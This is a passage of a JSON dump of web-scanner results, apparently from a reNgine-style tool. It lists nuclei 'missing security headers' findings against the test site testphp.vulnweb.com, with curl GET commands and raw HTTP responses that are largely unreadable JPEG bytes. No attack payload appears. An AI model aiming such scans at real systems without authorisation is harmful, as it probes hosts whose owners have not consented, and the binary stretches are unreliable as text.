�eV��q��9��r\u0018����0�Xk�\u0006����\u0014J�u��\u000e��\n2�\u001d��2.\u0014r@<x�k=MT߄\u0012,P��,-Q\u001a�r��=L1�p`s���x�=�hk�#9#ӧ�\n�C�'�f�>�h��%���^mv��K�]R�5=��;>%œ�8\u001bO,7z�g蹵%ud�2=�R:�w�D\u0011�\u0013�\u0017n���\u00047<�\f�\u001b�AƑ��Aq�|=���-p\\j\u0016&�U\u0003d����X�0US\u0019l`\u0005*��g\u0015���x��!�����\u0014HY���9�\u000f��og�k�6��8;��&�Vq�#ܕ�����z��T�9q\u0018\nN�p\u0007�Q��-\u0018��\u001aeK�B\u000f ����\u0017d.*Ȱ�U=��M|���i�A&�0ʮ��A\r�O>x��\u000f �r�^����b��i]c�!M嘜\u0001�;� \u0001�<�3_QJ�j�\b\u0012/y�Ā(p�,�W\fW!q�\u0004z��Ƞ��e�\u0011�_Qr��Ă\u001bz%E<�����Gc�S\u0012�|����3��)�"�{\twq���㺴�����̍ÇM5�׺�@����V�m��\u0019dd��d��!]��)��%Gd�\u0017h݃��wr���{b�jƪ\tQOH#\u0005�y�1���7�p\u0014��\u0017\frqik�K=m<�co����r�\u0015��ͶH"pCD���\u0013��@*FA\u0019:�q��\u001c��Qx�?��JcV���~�&U�\u0018�\u001e�ަ%@!�\u0018k���TD̐5\u001d����[��(��;���\u001b}�.VO̩%�\u0013��B���\b+�FőNH��\u001c0�:9��CGM\u001c\u0014�G\u0014(X�"�\u0001>O�p�>p��4\u0003C%e��=\u0015E��FD�1��ң\u0010��Xn�Y\u0018\u0016![,U�쓫UCMM\u001b�m\u0013\u0011����ŞA;\u0004��q��(\u001fh�t\u000e�G��t��\n�\u001b?���� �~���\u0007��eH\u0016\u0015!�\u001c�rc��"eo���׌�����\f!)\u000eO��\u001b�ttQ��p\fq�#2�Ԝ\u0003�\u0007?��[���5]Z�Dp��6KHi�F�����d k�C��\u000bURW%1h�f�0LNHʹ\u0005pp�[$\u00128�1�����4k4k\ftp�Q�j\u0014\u0006\u0005���\u0004d�b>��涁d1\u0019^I;_/u�`�U�Ͼ�PO�(\u001eڪ�Sb'\n9�\u001a����;�Q�\u001bco�V��(�o.�`\u001e�砺��=\u001bU4�_s���̴�0H�`�]�%�ڛd9\u001e��ǖ�jΣ�{���%m��$��Mٍ�i�A�~�\u0007 ��g!��+����X��G'|�L��\u0015�U5��F\u0019��8���^K\u0013C̣-9�m\u0015<w\u0010�\u0019��{���|A�Z��qhb��X)��V.�\n$��V��>�Ab����3���m����Z�����h�H�ե��nL��!M���#:=�-Cp4��V��e�d��\u0004��$�]�9\f�\u0001�<c\u001ccZGZOWm����Ve���5c*&��O�n�9<����5΢�ݣ9\u0019�����MyBQ�wY�w�*\f\u0001fWڏ\u000e��\u0012��\u0019�8]�a\u0019\u0004��\u001fQ[SU���\u001c\u0014�ћ\\Tp\\.\u0017j�V���!\u000b\u0012�QcUe-�d����P;����E4d�)h��3���� \u0012\u0001ǶH��uk}ɵ-.����gO��7;G���-ӿs�N�VDA\u0019ld�J�2$\u0003��p���7U.�Y%��Z%�����e�\u0003~>V%X��'����\u0018%z�WM;F�v\u001f�����é����}?UCp�[�vj�Tn��~�ɂ�F1����O,t��q�\b��Ϗ�T��m��8;��+A�KUl�W$�{c�;��ȩj'W\u0006\u0005A�\u001bҪIS���<��\rc\u0015\u0015�_���qV\u001d�aI6\u000e��]�\r�U���\n�[WY]h�J��m��WYd�����J�(��Q\u0013v��@_�Q��s�ܱ��5��A\u0007b��9h�+$�UWA�Hm�GX�\u0003\u0003f�ƒ��Y%����.'\u0019=3���\u0015E�����\u0001���r��A�x^E���@'����\u001af\u001bF��6��@�<�",c��J)c�!|\f�g�\u0001���%�\u000f��m!xo��\\���9���<U���<�\r��OG\u0019�D�3�F|�i�*������.�\r\u001fv��X;��h{���\\\u0005]�rJ���<�:����D�;!��"�v�z�V+����O�V���xRV=Ѝ�\u0004��D���j��\u0015$�M��:\u0003�T���ۜ��[;�\u0010IfR�N\u000b\u001e[�\u0006p<h�)�#Ս\u000fo|�\u0010e:�|�\u0011��c��\u0010�}�uf�\fq�������-Mgj&bx\u0003?MA��e\f$�H$\u001c4r.�S�y\u0007�\u001f��t�\u0007�:�c�yo\u0018\u001a\u0005"��\u001b��5c�����z\u000e\u000f��Е\\�T��[N��;��*�i��U�e�$c �yʰP��[\u00168��\u0014\u0014o�<=\u0013�SG\u001f\f�3�\u0002|ꅪ袞W��Zр�;�\u001e\u0018{6>d?�\u0006\u001b����}_��Y\u001fn�R�H\u0003,sQwx`;\u001dH �\u0018��\u0004{\u001d\u0015^�n���vJ�=\u001a\u001b�D��2mٖ*@E\u0001�*\fP\u0007�F2F�nW8�\f' �d\u001d��m���o\u0017Q�[t\u000f�j���e\u0013R�OGN�ݎ�\u0011\u001231J�!US�2\b��r\t'ZM��Yx��d\u0011��W�Y�*e_F\u0019\u0015��h��K\u0002���Iпº�T\r;�f���Q+�������;{{�g�\u00060�c�t۽eB[n]�I��Pc\u000b\u0018\u0007\u0001pp\u000f�\b9����\u0005d�\u0013?��\u0001��s��׿�4T�������|J��\u001a��\u0015�6���i\u0016)���\u0001e��rB�\u0007��\f\u0002\u00179\u0004\u0003�z:���G/e@���Z��j��=\u00038P?P��>\u0017\u001bpwj��\u0015l7\u001b\u001d�\u000b�(��\u0011\u0011hX�����\u001f(\r�b\u0014��\u0017\u0019k��m���r��jAFn�R1�R�!�=�n�h-�8�=@s����5��7G�����P5\u0014�Ԟ'\u0015�ݮL�)G }�I֫���g\u0002��\u0005��cC\u0015K�d�Ͼ>�i�'v͏��\f�\t��#w_���:k$��ֺ���I\u0017a@\f�͂�\u0001l�2�3�S����������4v0��02����\u0001$\u001e��ާ���ʐq�*L�\\\u0005{DP�Wi��V�*AK��ʛ�-$S�L�5�\b��I\u0004\u000f\u001c�e���,��X2�����#`\u001c��[`>��`��1*�{��1b\u0014�T����\u0004�G�\f[�����4�Y]�E\u0010�!��\n���\u000f��\u0015\u001c��\b��\u000bE(���q�<���Γ<#\u0019E���\u0007�՜S}1�\u001d\bQ�IRf\u0014�\n�K�y�\u0010��0��\b\u0018��d��8��3�u�H��\u00063"�\u001e�\u0004�G�\f\t\u0007�i�U�9�����*-ҵ��\r\u0011\u0014�q���-ܳ��R\u00179S�X�A�\u0006\u001c0#ʌ�FG�A��\u001fC�B��c�kl��0��\u0015��:\u0019\u0003۸U�3Av�]��Z�yv���0dm�\t\u0001���v.p\u0006\\~ڕOr�E���\t)��\u001b�\t$\u001b{�=���8\u0005�ό�y\u0007T�N�P!�z��V�gJh���ul*�KnU���\u0003#E6n���\u001b\u0005'P\\\u001e��S\u00075�,�;�\u001d��[i,\u00102���n�s�LUܤ�J8��\u001d���'��a��_\u0017\u0017\u000e\u001c��W�Q\u0006J�<-�Q����pA��\u0011��t��\u001a�����U���\u0012\u001aVffyQQ1�A\u0019Q��C`�DղR,]�Y�,^'ĉ\u001dJ+�,>W��Xd`�\u001c\u0010u��1��Id���As5MJ�:KT�+\u0018�f�-�,��x�q��[�]���������^�Z�K�����B��<�p�.�\u0012���\u0003�q�\u0019��0H`\t*qQ]++J�K$/,f)\fNW��ʶ<��<k���N�ʉ(�\u001a�\u0001-+2��8ǥW�1��H,I$�\u001d\\�mt�+�2K<�����X��\u001fՖl�����^��bi�n�[@b���"n���Ώ���<���EZU�t\u0010�\u0015,��WԹQ�F\t<`6���\u0010��K��l\u0014��̴��B���Ű�s�� ��ƾ|���])^��\t���7Ԏ\u0007k��|��9\u001e�\u0007�g�/�3T��2PR��[䥑��z��L\u0018��W�!�eJg#\u0007��u�\n|\u00170\u0002�~�_Ң�s���'��QY��n\u001f���J��\f��%cR\u0017�@,Wv|��G,�?X�kii�\u0015@��a}��G!,P\f�\u000f|�\t<\u0003�h{�� ��f\ti��2��2����\u001c��X�\u001c�\u001fvÝہ\u0019\u0007X���i���\n���m E,���dv�\u0017R0�\u0001�\f��\f���E%��4�\u0001g\u001e#l\u001f��DI8n���i���?m�D�l�U�\u001dxl6<��\u001f�\u000f��+���� !�x�⎵�\u0005�^�c�\u0013hR\u000eO��,Ř�\\�9ZZ��1��du\tU\u001b�$�>�����3h�j��\u0015�\fdp]\u0002'���\u0019S���8\u0004k@�ė��q\\n۪�\u0019e�Y\u001d�QZF$�\u000e\t��'?3\u000f\u0007\u001aZZAZ��\u0018�\f\u001e>���d����z��\u001b?Kt�[��~k\u000b�U������j1�`\r���\u001f�`\n1#,x\u0007KKU\u0016�L\u001cG|��O^>0\u0017���S$K;�����6bU\u0001bH\u0003<d��\u0016P�r�\u0018�\u001aZZmnF\bJn��aL.����RQ�Ϩl�5\u000f"�S_\u0005;��kly\u0002�\u000f�\u0007Ζ���$S���\u0003B\u0001��U_\r�puWX��wf��&\f�,m���-��\u0002F\u000e9ǂ5�X�d��\u000e��鈒�A\u0014i\u0014O�,\u000b\u0014;���ң��Ϝaik�{@���\t��\n���N�%��IGE\u0005������\u0018鷡U%�\t\\�\fĐ���\u0007�A9ڸ1�J����ui_RgM�Yʾ\u000fv#��r}M�?1�x��֩>*Fqk���9�E��T�5L��\u001bܖ8\u0018\u0019Ή�\u0016��A�6x�j��\u0013ԤNar��\u0010\b�A������w\u000f\u000f�\u0011�:�\u0007�hi\u001a�4��)�nW\n�i�a$B\u0002E6\u001dP�\u0003��d���i\u0005���D�T�(�\u0019\u000b�\u000br�P��@��\u001f�KK\\�W��X3տ�՟#�VY���C\u001d\u0002�v;�U��\f�HwaDn���1������m��VR�\u0013;,Ԑ�6�\u000e\u0019�$\u000e<iij���LM\u0005.��+��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 967, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/8.jpg.tn", + "discovered_date": "2024-11-13T02:42:38.699Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/8.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4139\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nEtag: "4dca64a1-102b"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0003\u0004\u0005\u0001\u0007\b��;\u0010\u0001\u0003\u0002\u0004\u0002\u0006\b\u0005\u0004\u0002\u0003\u0001\u0002\u0003\u0011\u0004\u0005\u0012!1AQ\u0006\u0013"aq�\u00142T�����$B���\u0015#3�Rb4r���\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007��(\u0011\u0002\u0001\u0003\u0003\u0004\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011!\u0004\u00141\u0005\u0012AQ\u0013\u0015"B2ab���\f\u0003\u0001\u0002\u0011\u0003\u0011?�S�K��@�\u001bU\u0010z�~\u001d*D���@e��\u0012+�oQ��Vߩ�}I�����{9%L�Oy\u0014ÃX�z�?��h�"2��0\u000f�5ޤѺ�\u000bU��Z|\f���vv�����\u0003)����i��R���Eã�o�t\u001f\u0014\nc�5�uB�\u000fq����\u001b���t�H�)�l\u0007�� N\u0015{\u001e�\u0003�U]�7\u0012`�\tM��aT��h�k�-&\u001el)=�\u0002�F\u0013k��\u0018���W6��$��S��u�\u000ey�eQ��\u0015�I9g��\u0017�0$�\u0015��56\f�m��#�����N�Oq�����Ʋh|���I/2\u001a,-���$w\u001d~uE�[ ������V�����"<�H�\f��;�\u0015R+.A��G.F\u0018K\u0003vTڞ�e\u0013��>�\u0002p\u0007`�_�:�\u0018\u0002�0A�ދ�C�\\!�\u001eJ�����\n�H�U+Z�wQkXBS�m�\u0014װ�3B�Ȏ\u0019������+J7�\t��hI���\u0016j\u0003�G΋��{C?\u0018�\u0013`6�d��3�=s��`��(�ȟ3�����\u001b'��wཥ��W\u0005�M|b��\u001fW<ظ\u0007�\t�\u0015Q�����\u001e%?J3�\u000f�����[\u000e7\f�b�օt� 3�.\u0006���趹\u001f����FYl=���R�a�\f�B���YO�\u001f���C_:i��ײ��FY,=���R�a�\f�b���YO�\u0012�\u0007�e@Gq�Յ�&G���[\u000fhg�\u0014�X{C?\u0018��\u0019t� \u00118j�\u0012�\u0011�jSa;2G�\u0013F�,=���Rɇ�C?\u0018��#��`8�ZOe$yԨ�RwfO2h�%��3��Yp�hg�\u00147�}6��\u0010\f(��\u001esK��De\u0003�Q�\u0016#k�~1K�^���(oE��~��0����OvSL\u00188V�\bO�@��{K_\u0018�E��埌Q�1�NH�\u001c��� M������\u0013���;W$�ӷ�\r�\rZ�$;m�c(\n�T\u0001�I�4��~��Ņ�׽z\u0016�\u0014 \u0001�E�$�xk\u001bl8p�ϨR�\b�\u001d-Ŵ;���L!��V\u0016�\u0002�+�\u0003��\u001f|�u��b\bk�.:�\b�LƁZ�Ѓ�X���h/���.B�eH))!! H�!;lg�0▪E�}P}�(���)#(%[\u001d���YWQ�J�.���]��b/\u0007\u0002\u001cs�@P$����M����\u0012�SM�^\u000e-A\t܉�G\u0018�\u0016��o\u001crԼ�E�u�+*���F�.���V��˶�\u001a��-#+�7\u0004J\u0013�a\u001a� ��\u0002$M\tu\u0019���;e��Yx�(�6\u001c�!\u0004�Y���\u000e����b��\fN�\u0019E�n��#�m��9���H1�\u001f��ڠ��Ɉ���[j\u0015�!�0��\u0003\u0007�&"\u000e�j)�8��Iq�f��}��\b\n'|����Y+7r�J\u0017�7�I�U~�����Gajȩ�>`x��Ķ��8��6�]:P�FE�+*Q�\u0012F�\u00065\u0010�Tq�C\u0007yƔ��\u0010��\u0011�=��\u0019'�y�v�l�p�_\fqn+�]����$q\u001eQ�?\u001aYW����\u000fd}\u001a��q7\u0015��۔��\u0004��\t\u0002\u000f\u00025\u001ae\u001cF���8�$�\u0016��\\C\u0004f��2�\b�\u001a�5\u0011���\u0002��î[�KL�խh%N\u0013�h�\u0004�\u001c\u0001o:�d[�]�Y\\��бd�W(\u0005��\u0003S�\t�\u0013��Ũ�{�\u0013�<X4��1\u000b��,ߘ\u0004���\u0012��<9H��4�X��\r�p]Y�\u0003�\u0019"7�Q�\u0015�/�ww�u,\\:۩�\b�*ˤ�7\u0018���o�����`k�\u001a]��mEJ%Dd��"gS���\u0013�=\n�he��1%J/\u0016\u000bn�Q�۾�\u001fq�<م$�j�=.�R�/�S�hO\u000e�\u0012�$��������Ze'e\r9@�֯�ݦ'���\u0012P\u0014�\u001c���se��\u0003A��jZ�����-4�Y\u001bk����r�TBGorv\u001bӏK���}I\u0003i\\��7��0���T�\u00044�k�\u001d�$��;N\u0013vm\u0014���ܘ�Gw\u0012|\u0006��������\u0005�\n�.�p�t����r�皤\u001d0�*���\u001d�SC\u0016WV�o�9�|��C���J���C"4���\u0013R�v�.��\u0019�\u001bG��VHL\u0002\u0006i�\u0006����ޒ]B\nV�\u0019i�l�β�F\u0012\u001ce���Ќ�@\u000e�>\u0014��\u0016�YԄ�ⳒN�����x�\u0016�u���\u0010BB�\u001c�T���\u001c7�4.����x�(�V\bB3��6�غ��/�\u0012îu��$�W]@�����\u0016�a͵�4\u0014\u001a�\u001ey�\n@�'��\f�\u0004F��\u000e\u001a�{���ܦ�(��Fl���*ݻ*��T\u0014����Q�*\u0007�\u0006i�"���\u0010�t���!qw��ݷ�>�\t�cI\u0011��Y�[\u00168��-\u0015t�>��P�ҳ\u0015&`(�\u001a��üP-���1��H\u001dA=��ӕ\u0016٭�p�mՙ�tR\u0002���\u000f�w���8G)\u0007�K�]N4�Wn�\u0010�\u0003,�\fs\u0007]�3"^HPK�F�H\u001a�p�oDNa]K�2��HP\b��y�}��U�,57=Z�n��1\u0019c�����U�\u0016\u0001c\n͉�\u0016���U��\b��Jں��j���\u000e��B\u000bn%3\u0005�F�{ֵ�\u001bl\bB\u0019lI��))H��\u0003a�\u001d��S\\�n\u001dYm$+)�刐 �\f\r�����u'��0��Ҝ�i!JP�,L�\u0001\u001aL��\u001fJ�|�,p�KRB^t\u0005����h;�j�Ͳ�ԧs��H�V��m�\u0001�����C8�,�!���;�bg:�\u0004�5�\u0018\u001a��.�\u001e����[�\u0002oqE�\u0013n��R\u001a �\u0002x}k�z\u0011�3��\nn��9n\u0002V�$���Q׈\u0002I܃�y& �\\�T��F�L@\u001e\u0002���^\u001e�k�u���D\u0018��+�^��\u0004�\u0019\u0013�Y�\u0015��\u001b[莩�ħi�\u000f�:���c�<\u000b�6\u0014d�*$����L��]�\tm����\u0002\u000e�R��b���)& ������q�@��]���U��2r�)L�����,=�ш\u000b�”�܅(\t��\u0015�\u0004�?:1w\u0017��ZP��%\t�`(���D��.� �q��!��Q���Y�w+��\u0012�,)X�a`6�\u0018��*x�1\u0014K�Z��\u0007�z�,��HS\u0004�)\u0006\f�G\u0001 ���\u0018��ıD���*ԭZ7��\u0015��\\=\t’�R-���\u0010]�h��]~T��e(Ő\u0005�p���\u0004\u0003�\u001a�*+2kZ�\u0015ZD\u0014\b�YB9V�p\u0002L�Ԥ��IWn��\u0016��m&@��L�37\u001a��RX)YЂ)�� \tN\u001eop�/�R��\u000eGF�DhF�6:�M2ѻ�[��\u0001SZ\u0012�Ǻ�C�Akv��Q\r�\u0018:�H��D*]�U�H\n�II\u0013\u001bH\u001e\u0015�nQn-`(����G\u0010�\u0013�v��\u000e����5a\u0017�D����u���x�\by���\u0002#��\u001bT��J�z�\u0007Q��c_�Y%L(%o\u0010hu�7\tZb\u0012�"u��H�Tn\\�ܽVT\u0015+�\n�\u0012\u000e��X�踸jє�\u001a�~�뫺ZD���c0\u0004\u001f�W�d.��Iq3m`��c9\u0019\u001bo��Y>C���-�%���d����'X'�O��[��n�ajNl��\u0001������f�:V��ʄ'a�km$�\u001e��S\u0002�y�\u0015\u0003A�_€a�.�\u0001�!#���J�I�N�����g �Guk�q`\u0010��-�/1\n'y��/4�25\u0006x�\u0014��\u0010u�\u001ba�`%:�G\u00045�3j��H8��\u0004��PU�'¶1|=~��[Z\u0003-���:�y���\u001d\u0012e-\u0002�$�� \rD�υ[�R�c\r-)!\u000f9�W08\b�|�\u0014�7VȄX&(ղ�s\u0002\b%*�\u001fޝ�\\e\u0018��Wn���O>:���&�\n\u001c$fȭ��@�\u0002� (F�)�˽Ir\u0017$�٣qg\n��\u0019�\u001b����T�\f\u001f�\u001c�6�����(��'.i�׉�����ʙ�;q��S���FRM�J�R\t�\u001b�\u001fÊ�*���0EJ���� \u000eU�\u0002�\tY�䟥[w�\n�Ӑ�P��W\t5��6�\u0001eAGI\u001a\u0011�UD)eq$�w�|�VR\u0012�\b�t"L�Ƅ��\t�ڛ��L�s\u001e4�|��\u0001\u0001�\u0001���J�2�G7*����&\u000e�\nT��<\u0012����vaCj����*p��\u001b�#�TEڒ������M\u000f=�B�'bi�)?\u00029�y-�.V���\u0004�́���]�:�\u0015��4����rgi֚�\u001f��U��:xҚ\u0007�\u0012�p�У�S�\rj�M���\u0006�x\u0011�R�O�uQ<�Y�\u0014��J�O}3�Q�懲\u0015�ҖH\u0003��L٥e!*�xD�a\t#:\t���J�\u0010��\u001c��&*�)"�(ˆ\u0014aL\u000b\u001bR��\u001a�\u0010A(<x��P�J�Uqrd�5#6�'�Z\r::��\u0010L�sN���"��w��²z�m*�4�7&\u0016gp5=��R��*A�P����h��ي�ՙ�*%i@$�`i�k!�!S\u001a�|�ҥ\\�\u000e��$\u0014�\u0002t�j\u00022�@m R�W�1f̤�����\u0017�\u0012��p��J�\bԵ(�cz������iR�PV�\f�y%m���\u001fqS%\u00031\u001e?*T�>E\u0011\u00039\u0011�>�j�\t�>�R�Q\u0001�N�\u0014�z�@ޕ*Ҹ2ˑ�\u00026\u001bTKBH:R�Q�\u001c[I))\u0012\u0007q�LI\u0001\u000f\u00109q�J���j��4���P��\\P\u0011=��Uf���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 968, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/5.jpg.tn", + "discovered_date": "2024-11-13T02:42:38.970Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/5.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4428\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:12 GMT\r\nEtag: "4dca64a1-114c"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0003\u0001\u0001\u0001\u0004\u0002\u0003\u0005\u0001\u0007\u0006��2\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0004\u0006\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011\u0004\u0012!1AQ\u0013"\u00052aq\u0006\u0014#B����R�\u0015b�r��\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006\u0007��/\u0011\u0001\u0003\u0002\u0005\u0001\u0007\u0004\u0002\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0013Qaq����"���\u0006�\u00142���\f\u0003\u0001\u0002\u0011\u0003\u0011?�\u001a�d�������0�V\u0015��gQ�%XmƲ ��Tg6�ru�Ʋ0��G\n>2y��d�EV\u0019m}3�1��<*������qY\u0016`��d��6�k"�w��r�{0�qY.��\u0019*>3��F\u001e\u0013u�\f�\u000f\u0018�Du2i��h.�H�2��\t\u0019^Ӗ�.z*�J��\u001d\u0014\u0002�@2ء\u0012\t\u0018=�+\u0012T\u00176.�-��EcZA\u0012,�*�!\t\u0003o\u0007�:�<��x����Fh�u�'\u000b\b6\u0001&�\u0003��\f4\r�|�Ӽ�@\u0005��>[$LL\r2Ѡ���\u0019ƈ���Ӆ�����\u0007�=N��2<t�R�*Xr�r�\u001d8?+\u000b�#2H��1�\u0012D�ሠ\u0006�6�9\u0006�o�}�\u0001`ֻV�V\f���./c�Y�p��4�z\u000fH�\u0011V\n��\u001b��u�\u0012)X\u0005�n��:��aU\u0004��\r?�?�\b�\rm^�����\r}��\nF�\u0019��I\u0004J�\u0015:�\u0003�d�?��SϬ��$!�j\u0004�6�_�_\u001fk�\r\\��UM4�(\b\u0016\u0017$����t���x$\u000e\u0019\u0003q�#ʚ�>�+\u001a9�3�;V��8��c��Lz\u0007Ӽ�6�53�\u0012�eZ8\t4\u0018���J�\u001c\u000e��4�@��M��1���\u0005EF�r9*H�(qV\u000b���,�q��������m��%� �\u0006�B�p�\u0004�1b\u0010��j9$�}?���,[M���\u0001\u001b�kQ\u001dױ�`�+l�iqf����Ww�%+\u0018���]���$�p/8󿡣�@���r�E�k\u001d�6<�\b��c\u0006�IYX���/�q��R:\u0018�5\n^%e\u001eǐ�\u0007��U}��<��&��R��)\u0012H��\r���<�9�&�W�I6�?a?9���!�uR��51>�\u000e��\u001e\u001dDl-8;ā����6\u000f?B\u001b\\n�jꧠ��q~c��i����$SH�\u00132L�@�W�*ё�f�z��+��m9���\u0014�b*��V�Z4o���V��\u001a�ٷJʭ�H�����\u000ex��\u001b�(��%�;+��U0��XKo���hi�\r4~��~`��(b»�z׎����h@`���6�eGݶ��V\b�\u0005�ʦ���6���\r�;�\u001d\t�@��s�C\u0014r�R3\u001f��2\t\u0014i���TG�:\u0010\b���B�'�(\\e�p� |�R�.�\u000b���t\u0005��\u0002C��7\u0016���"����8�\u0007M�E$,�&\u0014\u000e�<�\u0007��\u001d\t�4�JҼ�~��9jC,d�ف\u001c\u0001�;�]�\u0007kZ߇��P��\u0015�2�(k��/�\u0011�M���:�d�N�����林ԝ�CpX��8�/�\u0016<�\u001c�8������'�kkb�u\u0011G/�^O�T\u0014x�}Gׯ�Š�sJ\u0015�e\n�w�ZW�\r\u001e/�W{]{\u0005��UQ22]a}{�>]OK��F�*D&�7;��{��Q\u0010���C�P�G����v(\u0001��O8�ZWi��\u0001i#4֥A�ш��sW]��\u0013$�4N\u001fiV�n�\u0006\u001c��\u0010~��9#\u0001:\u0015F�H\u0003���\u0001��S���"��A%��x��\u000fw5���\u0003*�\u0003\u0016�IY�HY\u001byqE@��5��o�۾��\u0012(U_dP�V4-)$�J,�l�"��ךˌ\r,pƞ�s���\u00197B��-�C�m��\u000f\u0016\r��B�f�\u001b\u0014����\u001fE�ڄ����18��\u001d��UoU��"�оؤӳ0\u0006�p3cT����#�5\r$6x�\u0010z�&ʶ�Th\u001a#�V-\u0002j\u0002\u0015\u0005\t��\t\u0014M_#�\u001b�\u0005\u001e/+�óJ���F���%�K��R�F�*�2����~��hi�%d�4�Ez�\u0015BG�\u0006�5`t�\u0003�������*��I�\u000eù�9<e��@����xԊfQVv�@�]��xÂ��zI��c�\u0005u�A#*:�B\u0003Q�M\u0003G�DgSB���ޑ3����Z��\u0001�y\u0001�t錬\n�$��]\u0001\u0004�ˎ�x�\t��Y�\u0002��:d\u001a�A\u0010�f�\u001c�-�{�-tv݁���V2�.W5Y�\u0018\u000bKέ��,yt蓕�U��fP�[o�]\u0001aۥu'\u0011\u0012)��+\u0017ݹ\u001c8*\b,\b�{w\u0007���I�]\u0013Țy�\u0012eYD�C!dV\u001e�\t5�A�\u0002��\u000eT�B}k��1�2�K\u001f\u0014��.k\\30��F.ڗ\bݭ�}�j�,o�[\u0013\u001b\u001c�\u001a�<Qʂ�ov]�`�n��\u0012mH��^�古T�|r��]�\u0002O\u0015�u'�\u001c���������$�\u00166�rgK��]��\u0019����:�\n_;��}�\r�j\u0010�����sn�N�]��뷋��L�L�E\u0014Q�Wolq�v\u0002�/h#ڶ;��rT\u001b����1X�{I{@��d��d�\u000fóG�D�j�(Ν��\tm\u001f1a@��r7X\r^E�@�t�!�U�+\u001bI��GP\u0019�\nwn��\u0010\u000f\u001b�b\u000fZ 